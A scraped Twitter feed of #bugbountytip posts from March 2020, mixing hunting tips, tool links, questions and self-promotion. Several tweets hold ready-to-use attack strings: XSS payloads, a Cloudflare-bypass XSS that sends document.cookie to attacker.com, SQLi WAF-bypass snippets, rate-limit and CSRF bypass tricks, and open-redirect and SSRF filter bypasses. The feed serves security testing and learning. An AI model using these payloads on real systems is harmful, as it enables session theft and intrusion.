ghostlulz
@ghostlulz1337


2020-03-28 01:45:03
6 My company did some cool research using machine learning to predict vulnerabilities by looking at the words in a URL. More information on the blog: https://t.co/UeiBHIQOS3 #bugbountytip #BugBounty #bugbountytips #xss #ai #MachineLearning #infosec #appsec #redteam #pentest https://t.co/53ix3HGBrV
Offensive AI
@AiOffensive


2020-03-27 22:28:04
13 You know you can use machine learning to predict vulnerabilities based on the words in a URL. Check our awesome research by @ghostlulz1337 https://t.co/V1S2iThCb3 #bugbountytips #BugBounty #bugbountytip #xss #MachineLearning #ai #redteam #Pentesting #infosec #appsec https://t.co/UhUfJgSSiJ
Your Next Bug Tip
@YourNextBugTip


2020-03-27 17:58:47
0 #SelfXSS is pencil & u r John Wick This article ll teach u how to kill them all with a F pencil Self XSS #GodMode -Executing on priv. user acc -CSRF -Pre-Compromised Acc -Xss Jacking Gr8 Article by @hanspetrich๐Ÿ”ฅ https://t.co/JKMqNCUhHH #bugbountytips #bugbountytip #bugbounty
Prateek Thakare
@thakare_prateek


2020-03-27 17:29:52
3 #day3 #websecurity #bugbounty #100daystolearnandimprove Worked on recon process with @aish_kendle Continued with solving web security academy labs on web cache deception. #bugbounty #bugbountytip
Hack3rScr0lls
@hackerscrolls


2020-03-27 15:49:10
0 Do you track changes in JS static? Not yet? Tip by @igc_iv how to make it easier https://t.co/BBv0ydq90z [2/2] #BugBountyTip #OSINT #Pentest https://t.co/saFIApEL0e
Hack3rScr0lls
@hackerscrolls


2020-03-27 15:48:40
1 Do you track changes in JS static? Not yet? Tip by @igc_iv how to make it easier https://t.co/BBv0ydq90z [1/2] #BugBountyTip #OSINT #Pentest https://t.co/TaotKbGiBJ
Th3Alch3mist~
@Debian_Hunter


2020-03-27 13:07:09
0 @rahulnakum145 @YourNextBugTip Yes it's considered as self-xss , check if the site is changing your image name once they get uploaded ....or not . if no , then open the image link and check for the trigger....or else try for csrf.( plz correct me if I'm wrong ๐Ÿ˜… ) #bugbountytip
Doga
@n33dm0n3y


2020-03-27 09:30:13
2 sqlmap found vulnerable parameter but i cant bypass to Akamai WAF should i report this for a bug ? #BugBounty #BugBountyTip #BugBountyTips #InfoSec
Dr.FarFar ๐Ÿ‡ช๐Ÿ‡ฌโฉโฆ๐Ÿ‡จ๐Ÿ‡ฆ
@3XS0


2020-03-27 07:30:05
0 Do you still use tools like Hydra/Medusa for HTTP Basic Auth brute? Forget it! Use Burp Suite instead! #BugBounty #BurpSuite #BugBountyTip
Doga
@n33dm0n3y


2020-03-27 07:25:00
0 Hello guys anyone know Akamai WAF bypass for SQLi ==?? #BugBounty #BugBountyTip #BugBountyTips #InfoSec
srinivas_Uneek
@UneekVivek


2020-03-27 07:10:21
1 #bugbountytips #bugbountytip Lazy in Typing url encoded crlf In burp do this Rightclick on req click on "Url encode as you type" Hit enter u will to see crlf url encoded
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2020-03-27 04:02:19
1 network penetration testing GUIDE #bugbountytip #hacking #pentest #redteam https://t.co/gEo5YYA1Wy
Ankit Joshi
@ankit_2812


2020-03-27 01:54:53
1 Find out AWS S3 bucket name: 1) Find any CDN object URL 2) Append below string to after URL: `?AWSAccessKeyId=[Valid_ACCESS_KEY_ID]&Expires=1766972005&Signature=ccc` and you will get the bucket name. #BugBounty #bugbountytip #bugbountytips #hackerone https://t.co/7pN5jM3bOy
Unde5able
@Unde5able


2020-03-27 01:43:04
2 #RECON SERIES LAZYRECON @NahamSec #bugbountytips #bugbounty #BugBountyTip #hacker #hacking #infosec #cybersecurity #Website #Pentesting #unde5able https://t.co/vfEqrwIqP0
M4HunT3r
@MohamedeAddar


2020-03-27 00:48:22
1 i look at this pic, every time i start hunting on a program. #BugBountyTip https://t.co/PEFnDahhu2
Dan Cimpean
@DanCimpean


2020-03-26 10:42:39
0 Only few organisations have a policy for #ethicalhacking - the @intigriti ยดYour companyโ€™s security through the eyes of 10.000 hackersโ€™ webinar going on now is very insightful! #BugBountyTip #HackWIthIntigriti #infosec #bugbounty RESPEKT! @securinti
Sam
@coffeejunkiee_


2020-03-26 03:31:29
0 Has anyone ever done a Subdomain take over through https://t.co/JUZH4dHBFm? #bug #BugBountyTip #BugBountyTip
Ankit Joshi
@ankit_2812


2020-03-26 02:48:42
1 @gr4h4m31 @WhatsApp Its definitely privacy bug, as if somebody mistakenly post the image and delete it immediately even though others can get that image. #BugBountyTip #bugbountytips #privacy #privacybug
Miracle
@Infosec_Marine


2020-03-25 21:25:45
0 #bugbountytips #BugBountyTip #bugbounty #bugcrowd @Hacker0x01 @Bugcrowd @zseano @Jhaddix @brutelogic @NahamSec @stokfredrik I hope I get a positive kinda answer .. Pls y'all I need this ... A cyberdad https://t.co/ufkkemL6AF
Miracle
@Infosec_Marine


2020-03-25 20:57:58
1 #bugbountytips #BugBountyTip #bugbounty #bugcrowd #hackerone #h1 #hacker @stokfredrik doesn't have to be u tho but you's my favorite I hope I get a positive kinda answer .. Pls y'all I need this ... A cyberdad https://t.co/ufkkemL6AF
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2020-03-25 20:57:05
3 Pentest-Tools.pdf https://t.co/dA8bqzIl17 Pentesting tools.pdf https://t.co/pxzSz5lk0T iOS Pentesting Tools.pdf https://t.co/agf6foX2rN Penetration Testing.pdf https://t.co/IkErIsZDdL Penetration Testing Academy NFC.pdf https://t.co/DfMfkEtNiI #Pentesting #BugBountyTip #OSINT
Udit Bhadauria (Hackcura)
@udit_thakkur


2020-03-25 20:07:11
1 Me and my friends @KritikaRaghuva6 @sengarharshit1 wrote a script that will help in exploiting API keys/tokens. The sole purpose of the script is to make API Key/Token Exploitation easy. https://t.co/U4YkrxqwSD #infosec #hacking #exploitation #Quarantine #bugbountytip #API
Yumi
@Yumi_Sec


2020-03-25 17:32:42
1 Facing filters during open redirect vulnerability exploitation ? Try this "Host/Split" payload to abuse of the Unicode normalization: #BugBounty #BugBountyTip #Infosec (credit to Jonathan Birch) https://t.co/qExdrIlase
Ceos3c
@ceos3c


2020-03-25 16:01:59
0 Third part of the Ethical Hacking Diaries is up. Check out what I have learned in Week #12. https://t.co/i4HfI0qYMR #bugbounty #BugBountyTip #ethicalhacking #cybersecurity
AkaaZaan
@AkaaZaan


2020-03-25 15:33:33
0 Hey bughunters, Which is the best Language Translation extension for Firefox.? Non-english sites are trouble while bughunting. #bugbountytip
INTIGRITI
@intigriti


2020-03-25 14:22:15
8 Hey hackers, if you use automation, make sure to throttle your requests or avoid spamming contact forms. The people on the other side will be thankful! ๐Ÿ™ #BugBountyTip https://t.co/tBGYYSG2ME
Rafin Rahman Chy
@rafinrahmanchy


2020-03-25 13:19:30
2 Where to Find Exploits *Exploit Database(https://t.co/SsDpbiSqIX) *Kitploit *Packet Storm *CVE Sites *Github *Researcher blogs *Forums #WebSecurity #BugBountyTip #bugbountytips #netsec #appsec #Pentesting #PenTest #ethicalhacking #hacking #hacker #Exploit #cybersecurity #infosec
bb00x
@ihebhamad514


2020-03-25 13:11:30
0 Got an Self-XSS in email that return an error without sanitizing caracters on registration process (form is protected by a CSRF token that may prevent this issue being used on other users) Any Idea ? #BugBounty #bugbountytips #bugbountytip #xss
SinSin
@Sin_Khe


2020-03-25 12:06:52
6 Some of many ways to Quickly resolve subdomains #BugBounty #BugBountytips #BugBountyTip #infosec https://t.co/0HD9Jzntat
Hack3rScr0lls
@hackerscrolls


2020-03-25 09:28:08
4 How to disclose real IP behind cloudflare? Trick by @juwilie1337 (2/2) Links in pic: https://t.co/eGym22F8dv https://t.co/NT6cjjA2PU #BugBountyTip #OSINT #Pentest https://t.co/vR8JiSp7ET
Hack3rScr0lls
@hackerscrolls


2020-03-25 09:27:31
8 How to disclose real IP behind cloudflare? Trick by @juwilie1337 (1/2) Links in pic: https://t.co/eGym22F8dv https://t.co/NT6cjjA2PU #BugBountyTip #OSINT #Pentest https://t.co/r2UP4Drvsp
#000000
@nulllzero


2020-03-25 09:04:49
1 Few #XSS payloads which usually work #BugBountyTip 1. <iframe srcdoc=<svg/o&#x6Eload=alert(1)>> 2. <iframe/onload='this["src"]="jav"+"as	cr"+"ipt:al"+"er"+"t()"';> 3. <svg<0x0c>onload=alert(1)><svg> 4. '><details/open/ontoggle=confirm(document.location)>
Tushar Kulkarni
@vk_tushar


2020-03-25 08:58:12
0 Wanna mass scan for URLs having Host Header Injection...Here's something I created with help of @krishanuchhabra https://t.co/swh9qk99t4 #bugbountytip #bugbountytool
siLLyDaDDy
@sillydadddy


2020-03-25 06:43:30
0 #bugbounty #BugBountyTip Thank God !!!! I got my first triage and bounty @Bugcrowd Thanks to the community. Its the result of your hardwork as well as mine !!!
Anas Mahmood ๐Ÿ‡ต๐Ÿ‡ฐ
@AnasIsHere


2020-03-24 14:48:09
0 @alicanact60 Once, I received a private invitation. Found an unpatched XSS at OBB. Reported that XSS, and the report was closed as Duplicate (as usual). Found a patched XSS at OBB. Bypassed the fix. Reported and earned bounty. ๐Ÿ˜Ž #BugBountyTip
Anas Mahmood ๐Ÿ‡ต๐Ÿ‡ฐ
@AnasIsHere


2020-03-24 13:45:20
0 @alicanact60 I also check OBB reports while doing recon in first step. I think it's better to use the url directly ie (https://www.openbugbounty[dot]org/reports/domain/target[dot]com) without using any dork to view all the reports of your target on OBB. #BugBountyTip
SinSin
@Sin_Khe


2020-03-24 12:30:13
0 Host Header injection vulns are being found a lot lately, it was time for a Wrap-Up #BugBountyips #BugBountyTip #infosec https://t.co/lUvRnwOgeW
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-03-24 12:01:33
1 Wordpress Plugin WPForms 1.5.9 - Persistent Cross-Site Scripting Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ‘‡๐Ÿ‘‡๐Ÿ‘‡ #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone EDB-ID: 48245 CVE: 2020-10385 https://t.co/sV4KD5DCcC
path_finder_1
@Mayur_Chavan


2020-03-24 10:38:58
0 @zseano @omespino @Jhaddix @HusseiN98D Is there a way we can get the response of csrf ? When victim clickes on the link a json file gets dowloaded.....anyway to capture this response ? #BugBountyTip #BugBounty #ThanksInAdvance
Shubham Sharma
@Shubham_pen


2020-03-24 08:37:57
2 A medical facility on standby to help test any coronavirus vaccine has been hit by a ransomware group that promised not. @rajchandel @ForbesTech @Forbes #cybersecurity #infosec #BugBountyTip #ransomware #Malware #COVID2019 #Coronaindia #TuesdayMotivation https://t.co/tN56A9cZtS
Yash Sodha ๐ŸŒŸ
@y_sodha


2020-03-24 07:42:58
2 @kunalp94 Just enable both these rules to disable 304 Not Modified responses from the server entirely :) #BugBountyTip https://t.co/dMCyYYfYJg
xyele
@zeroxyele


2020-03-24 06:05:26
3 I've released a new tool for extracting values from file/s or URLs. https://t.co/tejiFXHXop #bugbounty #hackerone #bugbountytip #bugbountytips #togetherwehitharder https://t.co/I1wY315T53
Dr.FarFar ๐Ÿ‡ช๐Ÿ‡ฌโฉโฆ๐Ÿ‡จ๐Ÿ‡ฆ
@3XS0


2020-03-24 05:57:18
0 A small demo how to brute HTTP Basic Auth with BurpSuite #BugBounty #BurpSuite #BugBountyTip https://t.co/uNyU11CR8O
Kamil Vavra
@vavkamil


2020-03-23 22:39:58
0 Every 6 months or so when one of my domains is about to expire, I report XSS to my registrar in exchange for free credits. Losing count, but I think this one is 3rd in a row. It's not much but it's honest work :) #bugbountytip #lifehack
andri๐Ÿ‘พ
@andripwn


2020-03-23 21:44:31
2 hmmm, 10hours find it! #bugbountytip #bugbountytips https://t.co/7feJV5l3Jy
Hack3rScr0lls
@hackerscrolls


2020-03-23 14:27:10
0 A small demo how to brute HTTP Basic Auth with BurpSuite #BugBounty #BurpSuite #BugBountyTip https://t.co/HNS3aEyZIZ
Hack3rScr0lls
@hackerscrolls


2020-03-23 14:22:51
0 Do you still use tools like Hydra/Medusa for HTTP Basic Auth brute? Forget it! Use Burp Suite instead! #BugBounty #BurpSuite #BugBountyTip https://t.co/FPgurhruwI
INTIGRITI
@intigriti


2020-03-23 13:24:55
8 Sometimes, you're just one case away from a crit! Thanks for this amazing IDOR #BugBountyTip, @JohnH4X00r! https://t.co/bOzHrtfSUv
Dr.FarFar ๐Ÿ‡ช๐Ÿ‡ฌโฉโฆ๐Ÿ‡จ๐Ÿ‡ฆ
@3XS0


2020-03-23 09:18:42
1 This one helped me recently to bypass a custom #XSS filter! #infosec #bugbounty #bugbountytip https://t.co/gSqMyIq9VG
Mohammed Adam
@iam_amdadam


2020-03-23 06:39:23
0 Uploaded some bugbounty poc findings in my channel. Watch karo. ๐Ÿคฉ ๐Ÿ‘‰https://t.co/3orYXjafM9 #bugbounty #bugbountytip #poc #bughunting #cybersecurity #ethicalhacking https://t.co/JgT1NQ8FxF
Ankit Joshi
@ankit_2812


2020-03-23 03:18:41
0 Bugbounty tips#3 Short IP addrs by dropping zeroes. To bypasses WAF filters for SSRF, open-redirect, whr any IP got blocked Exmpls: http://1.0.0.1 โ†’ http://1.1 http://192.168.0.1 โ†’ http://192.168.1 #infosec #SSRF #bugbountytip #bypass #WAF #bugbountytips #hackerone #hackers
Unde5able
@Unde5able


2020-03-23 03:15:57
2 #RECON SERIES VULNERABILITY SCANNERS #bugbountytips #BugBounty #bugbountytip #Website #Pentesting #Scanner #acunetix #nessus #hacker #hacking #CyberSecurity #unde5able https://t.co/P1tMdheoqE
Udit Bhadauria (Hackcura)
@udit_thakkur


2020-03-22 21:01:00
10 Rate limit bypass: Add header/s with request X-Originating-IP: IP X-Forwarded-For: IP X-Remote-IP: IP X-Remote-Addr: IP X-Client-IP: IP X-Host: IP X-Forwared-Host: IP If bypass successful, & after a while blocking request again. Increment the last octate #infosec #bugbountytip
SinSin
@Sin_Khe


2020-03-22 17:39:27
0 @ome_mishra headers for this bypass(RateLimit) are: X-Forwarded-For: X-Forwarded-Host: #bugbountytip #bugbountytips #BugBounty
Ome Mishra (De.Hack3r)
@ome_mishra


2020-03-22 09:52:35
0 Try Rate limiting Bypass by X-Host: 127.0.0.1 .. If block after some request then try to increse the address from ...1 to ...2 and so on . Mine worked ..... #BugBountytips #bugbounty #bugcrowd #hackerone #bugbountytip #YourNextBugTip
Bug Bounty Poc
@Hackingig


2020-03-22 06:48:17
0 $3,500 for SSRF on slack https://t.co/2tj6Sc3H37 #bugbouny #slack #bugbountytip #BugBountyPoc
loopspell
@loopspell


2020-03-22 06:39:08
0 Awesome blog for SRT Members to hunt more efficiently on @SynackRedTeam Thanks @ozgur_bbh for this. #BugBounty #bugbountytip #BugBountytips https://t.co/vHAR7amfyi
Don Davis ๐Ÿ’ป
@QSoloX


2020-03-22 06:05:48
0 Trying to decide if I should start making youtube videos about writing automation scripts in python to solve CTF challenges.. hm what do you guys think? #hacking #bugbountytip #BugBountytips #infosec
niravsikotaria
@niravsikotaria


2020-03-22 05:52:30
0 SQLMAP Usefull CMD #sqlmap #hack #websites #bug #BugBounty #bugbountytip https://t.co/LMmkw9v8gY
Th3Alch3mist~
@Debian_Hunter


2020-03-22 05:00:57
7 If you are a #bughunter then you must check out this awesome collection of tools gwen001. It's really really helpful while hunting and fuzzing a webapp. <3 #bugbounty #bugbountytip #infosec https://t.co/CBn1M32s2N
Minture
@minturebr


2020-03-22 02:58:18
0 #bugbounty #infosec #bugbountytip You can use %OD or %0A for Open Redirect filter bypass, example : //example.com [BLOCKED] /%0D/example.com [WORK], Also works for pseudo protocol : java%0a%0ascript%0d%0d:alert(0) #Remind https://t.co/z5JduGhnu2
tololovejoi
@tolo7010


2020-03-22 02:38:05
0 Answer: I typical try XXE at any endpoint that accepts XML format input. Sometimes you can use Burp repeater to try changing basic GET/POST params to XML format and the server could accept it, but you need to confirm if it is vulnerable. Good Luck and Happy Hacking! #bugbountytip https://t.co/hyF3tmPkqB
bing0o
@hack1lab


2020-03-21 23:25:49
2 simple bash script to check for status code for a list of domains, a better script with threads is here: https://t.co/ra2GGetXw4 #recon #bugbountytip #bugbountytool #bash https://t.co/9AFwQo8orr
Arif Khan
@payloadartist


2020-03-21 09:13:35
11 A simple one liner I use to enumerate sub-domains and open them in Firefox, coz it's oddly satisfying. Particularly useful to take a quick glance at sub-domains and take notes. #bugbounty #bugbountytip https://t.co/wtCVBQ42ex
MRM
@agamimaulana


2020-03-21 09:04:15
0 Remote Image Upload Leads to RCE (Inject Malicious Code to PHP-GD Image) https://t.co/0atk962YJZ #bugbounty #bugbountytips #bugbountytip
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-03-21 06:31:10
0 Antivirus Bypassing For Fun and Profit Tutorial https://t.co/8M1vC1oIF6 If you want to learn Bug Bounty and Make your career in Cyber Security Follow #Hackdoor -๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ Facebook - https://t.co/iNczOcGmCt #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-03-21 06:27:04
0 inurl:โ€q=user/passwordโ€ (for finding drupal cms ) If you want to learn Bug Bounty and Make your career in Cyber Security Follow #Hackdoor -๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ Facebook - https://t.co/iNczOcGmCt #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #CyberSecurityTraining
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-03-21 06:25:18
1 โ€œindex ofโ€ inurl:wp-content/ (Identify Wordpress Website) If you want to learn Bug Bounty and Make your career in Cyber Security Follow #Hackdoor -๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ Facebook - https://t.co/iNczOcGmCt #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-03-21 06:23:24
2 Biggest Free Ebooks Collections https://t.co/Y5jUzpDhmv https://t.co/pXLE8Y13Pp #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #CyberSecurityTraining #devsecops #cybersecurity #training #ceh #eccouncil #certification #hackerone
darkwayg
@thedarkwayg


2020-03-21 02:50:49
0 I earned $100 for my submission on @bugcrowd https://t.co/BJAHr0D7B8 #ItTakesACrowd By using /\ at the start of the link, you can bypass the open redirect filter. ?url=/\https://t.co/MvGIkcxzV3 #bugbountytip #bugbounty
Ankit Joshi
@ankit_2812


2020-03-21 02:33:44
0 Bugbounty tips#2 Try this MySQL tricks to break some #WAFs out there. SELECT-1e1FROM`test` SELECT~1.FROM`test` SELECT\NFROM`test` [email protected]^1.FROM`test` SELECT-id-1.FROM`test` #SQLi #bypass #bugbountytip #bugbountytips #hackerone #HackThePandemic #hackers
Daher Mohamed
@DaherMohamed4


2020-03-20 21:12:58
0 Recently found a RXSS in captcha response Resolve captcha --> capture request --> change captcha response to XSS payload --> XSS trigger #BugBounty #BugBountyTip #BugBountyTips
Manas
@manas_hunter


2020-03-20 20:04:28
3 Rate Limit Bypass: Add this characters after the email or mobile %09, %00. Or Add an extra header in the request X-Forwarded-For: IP If it doesn't work then you can try adding multiple headers to bypass the function Thanks @zseano #infosec #bugbountytips #BugBountyTip #bugcrowd
๐Ÿ‘‘RUSHII๐Ÿ‡ฎ๐Ÿ‡ณ
@u1tran00b


2020-03-20 19:51:31
2 Rate Limit Bypass: Add this characters after the email or mobile %09, %00. Or Add an extra header in the request X-Forwarded-For: IP If it doesn't work then you can try adding multiple headers to bypass the function Thanks @zseano #infosec #bugbountytips #BugBountyTip #bugcrowd
Adam Langley
@adamtlangley


2020-03-20 17:43:09
0 Iโ€™ve seen a lot of people sign up for https://t.co/13ucD5B0eb and get only 1 or 2 flags. So the next challenge will have a walkthrough to help people improve their web app hacking skills #bugbountytip https://t.co/Ha7XodSoEj
Katie Paxton-Fear
@InsiderPhD


2020-03-20 14:47:19
3 #bugbountytip donโ€™t read passively! Take notes on all the write ups, disclosures bugs, articles, techniques you read. Youโ€™re more likely to remember it AND if you come across a similar thing you can recall it from your notes and execute it! #BugBounty
Kartik Charande
@kartikraj909


2020-03-20 07:09:51
3 Which OS is best Arch Linux Vs Ubuntu #infosec #bugbountytip #linux @stokfredrik @NahamSec @TomNomNom @ehsahil @shehackspurple @Tabnexa
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-03-20 06:52:35
0 Nano CANBUS - #carhacking Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ‘‡๐Ÿ‘‡๐Ÿ‘‡๐Ÿ‘‡ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/FJadZ9Drft
Shubham Sharma
@Shubham_pen


2020-03-20 05:01:11
3 FTP Penetration Testing.The File Transfer Protocol is a standard network protocol used for the transfer of file @rajchandel @ubuntu #infosec #linux #cybersecurity #bugbountytip #ftp #pentest #FridayMotivation https://t.co/zkTaiJoXuQ https://t.co/qtNu6ugLy8 https://t.co/KNlINvC9kp https://t.co/yXTNvrtBVc
Arif Khan
@payloadartist


2020-03-20 04:45:48
1 Found these amazing walkthroughs of Android vulns by @B3nac: Deeplink issues: https://t.co/Wr3uYOc3zb Exploitation of exported activities (OOS on some programs, nevertheless an interesting watch) https://t.co/334PGTCTBk #bugbountytip #bugbounty
srinivas_Uneek
@UneekVivek


2020-03-20 02:41:00
1 #BurpsuiteTips #bugbountytip BURPSUITE SHORT CUTS KEYS: To on off intercept = ctrl + t, forward request from proxy Ctrl + f Send Request to Repeater : Ctrl + R Send Request to Intruder : Ctrl +i #infosec
GokhanGK
@gkhck_


2020-03-19 22:53:44
1 The biggest bug bounty tips here! Get your future with that tips. https://t.co/9X6KtWI5Ma @Hacker0x01 #bugbountytip #infosec #bugbountytips
Asะฝัฮฑff
@MrAshraff_


2020-03-19 18:19:23
0 Apart from VPS, do I need to use VPN as a bug hunter #bugbountytip #bugbountytips #togetherwehitharder #CyberSecurity
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-03-19 16:32:02
2 Thanks for the Swag ๐Ÿ”ฅ๐Ÿ”ฅ @Hacker0x01 #TogetherWeHitHarder #hackerone Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ‘‡๐Ÿ‘‡๐Ÿ‘‡๐Ÿ‘‡ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops https://t.co/62TjnXsFj5
Arif Khan
@payloadartist


2020-03-19 10:51:23
1 Some awesome wordlists for fuzzing and dir bruteforce: (By @nullenc0de) https://t.co/yRz3fI6D7U https://t.co/M1k4IXLkTn (By @Jhaddix) https://t.co/mWwzl6jxL3 https://t.co/n1buLliuqU (By @i_bo0om https://t.co/papuednVH6 https://t.co/9xhfvVJSJN #bugbounty #bugbountytip
Sunil
@Sunilkande1137


2020-03-19 10:43:12
0 My ever funny 2FA Bypass bug https://t.co/bNcO5qbhPt #bugbounty #bugbountytip
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-03-19 10:06:45
1 Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ‘‡๐Ÿ‘‡๐Ÿ‘‡๐Ÿ‘‡ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/iAN3PLZ5ze
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-03-19 09:59:04
0 ๐Ÿ”ฅ๐Ÿ†๐Ÿ”ฅ DevSecOps Online Training Batches - Start 25-March-2020๐Ÿ† Strength : 3 ๐Ÿ’ต Reachout To Join ๐Ÿ’ตhackdoor.trainings[at]gmail(dot)com ๐Ÿ”ฅ๐Ÿ”ฅ๐Ÿ”ฅ๐Ÿ”ฅ๐Ÿ”ฅ๐Ÿ”ฅ๐Ÿ”ฅ Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ‘‡๐Ÿ‘‡๐Ÿ‘‡๐Ÿ‘‡ https://t.co/iNczOcGmCt https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips https://t.co/lkHIhLspJr
Vishnu
@k_v0


2020-03-19 03:59:11
0 https://t.co/CjPR6PjGtVโ€ฆ Shout out to another great @j3ssiejjj tool!! #BugBounty #bugbountytip #bugcrowd https://t.co/bvgnKRd8rY
The Notorious B.E.E. ๐Ÿ
@securibee


2020-03-19 02:40:55
0 I saw this tweet and it invigorated me. Thought I'd share. "Success is the sum of small efforts, repeated day in and day out." - Robert Collier #bugbountytip #LifeLessons #NeverGiveUp https://t.co/DS7wXokzb8
Unde5able
@Unde5able


2020-03-19 02:08:20
1 #RECON SERIES GITHUB RECON #bugbountytip #bugbountytips #bugbounty #infosec #informationtechnology #github #recon #Website #Pentesting #hacking #hacker #cybersecurity #computer #unde5able https://t.co/3LvTUiLaTk
Noble Six
@NobleSiXSS


2020-03-19 00:33:33
0 Aws bucket not taken -> stored xss -> account takeover = $$$ #BugBounty #BugBountyTip #BugBountyTips
Yadhavi
@PrincessYadhavi


2020-03-18 20:36:27
0 Double up your defenses. There will be a lot of bored and stupid scriptkiddies target your systems in this quarantine time. #bugbountytip #bugbountytips #infosec
The Bug Bounty Podcast
@bounty_podcast


2020-03-18 19:23:50
10 Episode #3 - We sit down with @NahamSec to talk about streaming, all things community, doing deep work, mass recon and the power of long term collaboration. Listen on https://t.co/ojVfVynYPD #bountylife #bugbounty #bugbountypodcast #bugbountytip #bbp
ALL ABOUT HACKER
@AboutHacking


2020-03-18 16:24:50
0 How to Start Bug Bounty https://t.co/89AsK9PbQd #bugbounty #bugbountytips #bugbountytip #infosec
Bogdan Bodishtyanu
@xalerafera


2020-03-18 15:49:49
0 XSS Double Sh0tโšก๏ธ- in one request #BugBounty #bugbountytip #bugbountytips https://t.co/nyoSUJwz6g
eissen5c
@eissen5c


2020-03-18 14:53:01
0 cloudflare bypass XSS using location with cookie value payload : %3Cp%20style=overflow:auto;font-size:999px%20onscroll=x=location=%27http://attacker.com?cookie=%27+document.cookie%3EAAA%3Cx/id=y%3E%3C/p%3E #bugbountytip #xss #bugbounty
vdvcoder | Bathrobe | Olivier
@vdvcoder


2020-03-18 14:14:03
0 @intigriti Always do a dnsresolve of https://t.co/vvYzKMu4YB and check/surf to the IP. Sometimes you get a another application then the https://t.co/vvYzKMu4YB application. that can have some sensitive data. #bugbountytip
Cr33pb0y
@cr33pb0y


2020-03-18 10:29:16
0 @intigriti If you got a duplicate bug, you have to monitor it until it will be resolved. When this will happen, recheck your bug. You can obtain a great surprise. #bugbountytip
CyberTaters
@CyberTaters


2020-03-18 10:04:41
2 #Bug #Bounty #Tips part 5 and 6! #infosec #informationsecurity #infosecurity #potato #PotatoSecurity #PotatoSec #ethicalmashing #pentesting #bugbountytip #BugBounty #masherone #bugcrowd #mashed #appsec #webappsec #webapp #bbtips #PenTest https://t.co/2zeiCqd3wb
Seasoned Cyber Security Professionals
@scspcommunity


2020-03-18 10:04:18
5 #Bug #Bounty #Tips part 5 and 6! #infosec #informationsecurity #infosecurity #cyber #CyberSecurity #CyberSec #ethicalhacking #pentesting #bugbountytip #BugBounty #hackerone #bugcrowd #hacked #appsec #webappsec #webapp #bbtips #PenTest https://t.co/Emnwo8BMsC
๐Ÿ‘‘RUSHII๐Ÿ‡ฎ๐Ÿ‡ณ
@u1tran00b


2020-03-18 05:01:34
6 Bypass CSRF Protection: Using a CSRF token from different accounts Replacin the values of the same length Clickjacking Change the request method Delete the token param or send a blank token Remove the referer header #WorkFromHome #infosec #bugbountytips #BugBountyTip #bugcrowd
Ankit Joshi
@ankit_2812


2020-03-18 02:32:24
0 Try this @shodanhq query tip#1: If "ssl:<domain>" doesn't return anything try following: 1. "https://t.co/E02LCIPCPJ:<domain>" 2. "https://t.co/E02LCIPCPJ:<domain> 200 OK" #bugbountytips #BugBounty #bugbountytip #hackers #hackerone #OSINT #shodan
Your Next Bug Tip
@YourNextBugTip


2020-03-17 17:15:21
1 Can you exploit #sqli in LIMIT CLAUSE? Pretty TRICKY but @iamnoooob found a way, he created 127 items to exploit it (Blind Sqli) Why? Bc ASCII numbers are from 0-127 Clever Hack by @iamnoooob๐Ÿ’ฏ #bugbountytips #bugbountytip #bugbounty https://t.co/tMOlQiDx2n
Nick || hunt4p1zza
@ngkogkos


2020-03-17 12:14:07
